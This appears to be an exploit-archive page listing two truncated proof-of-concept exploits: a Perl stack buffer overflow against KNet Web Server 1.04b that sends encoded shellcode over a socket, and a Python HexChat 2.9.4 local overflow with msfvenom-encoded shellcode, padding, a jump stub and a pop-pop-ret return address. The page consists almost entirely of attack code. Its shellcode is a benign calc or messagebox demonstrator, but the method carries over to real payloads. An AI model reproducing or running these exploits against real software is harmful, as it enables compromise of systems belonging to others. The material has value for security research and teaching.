KNet Web Server 1.04b - Stack Corruption BoF Exploit |
#!/usr/bin/perl # KNet Web Server Stack corruption BoF PoC # Written by Wireghoul - http://www.justanotherhacker.com # Date: 2013/04/11 # Version: 1.04b # Tested on: WinXP SP3 use IO::Socket::INET; $host = shift; $port = shift; print "KNet Web Server stack corruption BoF PoC - Wireghoul - http://www.justanotherhacker.comn"; die "Usage $0 <host> <port>n" unless $host && $port; $sock = IO::Socket::INET->new("$host:$port") or die "Unable to connect to $host:$portn"; # Shellcode for calc.exe $shellcode= "x89xe2xdaxd5xd9x72xf4x5dx55x59x49x49x49x49" . "x49x49x49x49x49x49x43x43x43x43x43x43x37x51" . "x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" . "x41x42x32x42x42x30x42x42x41x42x58x50x38x41" . "x42x75x4ax49x6bx4cx78x68x4ex69x45x50x73x30" . "x63x30x61x70x6ex69x78x65x75x61x39x42x62x44" . "x6cx4bx51x42x34x70x4ex6bx72x72x46x6cx4ex6b" . "x71x42x37x64x4ex6bx44x32x36x48x54x4fx4ex57" . "x53x7ax35x76x76x51x39x6fx44x71x4bx70x4ex4c" . "x77x4cx35x31x73x4cx47x72x64x6cx67x50x4ax61" . "x78x4fx54x4dx33x31x68x47x49x72x6ax50x73x62" . "x63x67x6cx4bx52x72x66x70x6ex6bx53x72x77x4c" . "x63x31x48x50x6ex6bx73x70x64x38x6ex65x69x50" . "x52x54x50x4ax65x51x48x50x56x30x4cx4bx70x48" . "x47x68x4cx4bx42x78x37x50x66x61x78x53x39x73" . "x77x4cx57x39x4cx4bx75x64x4cx4bx77x71x38x56" . "x70x31x59x6fx76x51x39x50x6cx6cx6fx31x6ax6f" . "x34x4dx53x31x78x47x45x68x79x70x42x55x6bx44" . "x77x73x61x6dx59x68x47x4bx51x6dx34x64x62x55" . "x4dx32x31x48x4cx4bx71x48x47x54x37x71x4ex33" . "x43x56x4ex6bx76x6cx32x6bx6cx4bx70x58x57x6c" . "x36x61x79x43x6ex6bx73x34x6ex6bx33x31x4ax70" . "x4bx39x73x74x34x64x54x64x63x6bx31x4bx65x31" . "x33x69x72x7ax70x51x39x6fx69x70x70x58x31x4f" . "x52x7ax6cx4bx36x72x58x6bx6bx36x73x6dx63x5a" . "x55x51x4cx4dx6bx35x6cx79x35x50x63x30x65x50" . "x66x30x35x38x46x51x6ex6bx50x6fx4cx47x79x6f" . "x6ex35x4dx6bx5ax50x68x35x6fx52x62x76x42x48" ...read more...
| |
| |
HexChat 2.9.4 Local Exploit Submission |
#!/usr/bin/python # HexChat 2.9.4 Local Exploit # Bug found by Jules Carter < @iMulitia > # Exploit by Matt "hostess" Andreko < mandreko [at] accuvant.com > # http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html junk1 = "B" shellcode = ( # msfvenom -p windows/messagebox EXITFUNC=process BufferRegister=ESP -e x86/alpha_mixed -f c "x54x59x49x49x49x49x49x49x49x49x49x49x49x49x49" "x49x49x49x37x51x5ax6ax41x58x50x30x41x30x41x6b" "x41x41x51x32x41x42x32x42x42x30x42x42x41x42x58" "x50x38x41x42x75x4ax49x78x59x68x6bx6dx4bx4bx69" "x44x34x64x64x59x64x74x71x78x52x6cx72x33x47x34" "x71x78x49x42x44x4ex6bx50x71x50x30x4ex6bx64x36" "x54x4cx4cx4bx44x36x77x6cx4cx4bx33x76x77x78x4c" "x4bx73x4ex51x30x4ex6bx75x66x56x58x72x6fx72x38" "x51x65x68x73x43x69x37x71x38x51x39x6fx58x61x73" "x50x4ex6bx30x6cx36x44x77x54x6cx4bx42x65x75x6c" "x6ex6bx73x64x36x48x31x68x46x61x6ax4ax4ex6bx52" "x6ax66x78x6ex6bx73x6ax57x50x43x31x7ax4bx6dx33" "x34x74x42x69x6cx4bx47x44x4cx4bx67x71x48x6ex74" "x71x6bx4fx36x51x79x50x6bx4cx4ex4cx4cx44x39x50" "x34x34x75x57x49x51x4ax6fx36x6dx67x71x4ax67x5a" "x4bx5ax54x67x4bx71x6cx61x34x34x68x32x55x6dx31" "x6ex6bx33x6ax47x54x76x61x38x6bx71x76x4cx4bx64" "x4cx52x6bx4ex6bx71x4ax67x6cx67x71x4ax4bx4ex6b" "x74x44x4cx4bx76x61x69x78x4ex69x62x64x66x44x47" "x6cx63x51x5ax63x6ex52x33x38x61x39x69x44x6bx39" "x59x75x6cx49x58x42x73x58x4ex6ex72x6ex56x6ex58" "x6cx62x72x4dx38x4fx6fx6bx4fx69x6fx69x6fx4fx79" "x61x55x75x54x6dx6bx31x6ex4ex38x79x72x70x73x6f" "x77x45x4cx45x74x70x52x39x78x6cx4ex4bx4fx49x6f" "x59x6fx6fx79x43x75x55x58x73x58x62x4cx70x6cx51" "x30x77x31x53x58x67x43x54x72x66x4ex61x74x71x78" "x52x55x44x33x62x45x61x62x6dx58x51x4cx75x74x57" "x7ax4cx49x58x66x73x66x6bx4fx30x55x47x74x6bx39" "x4fx32x72x70x4dx6bx39x38x6dx72x72x6dx4fx4cx4b" "x37x35x4cx67x54x30x52x5ax48x75x31x39x6fx6bx4f" "x39x6fx33x58x42x4fx34x38x53x68x31x30x72x48x35" "x31x73x57x61x75x62x62x35x38x72x6dx72x45x54x33" "x62x53x54x71x69x4bx6fx78x33x6cx75x74x54x4ax6f" "x79x78x63x61x78x72x78x45x70x77x50x75x70x70x68" 
"x72x6dx50x53x37x36x77x51x70x68x43x42x30x6fx42" "x4dx71x30x35x38x52x4fx66x4cx31x30x61x76x61x78" "x71x58x50x65x42x4cx32x4cx55x61x5ax69x6ex68x72" "x6cx61x34x44x50x4fx79x4dx31x56x51x4bx62x33x62" "x61x43x46x31x52x72x39x6fx58x50x46x51x49x50x42" "x70x69x6fx36x35x34x48x41x41" ) junk2 = "A"*(13306-len(shellcode)) stage1 = "x4cx4cx77x21" # 21 byte jump (JA) ret = "x63x64x62x68" # ASCII PPR junk3 = "C" stage2 = "x61" # POPAD x 38 stage2 ...read more...
| |
| |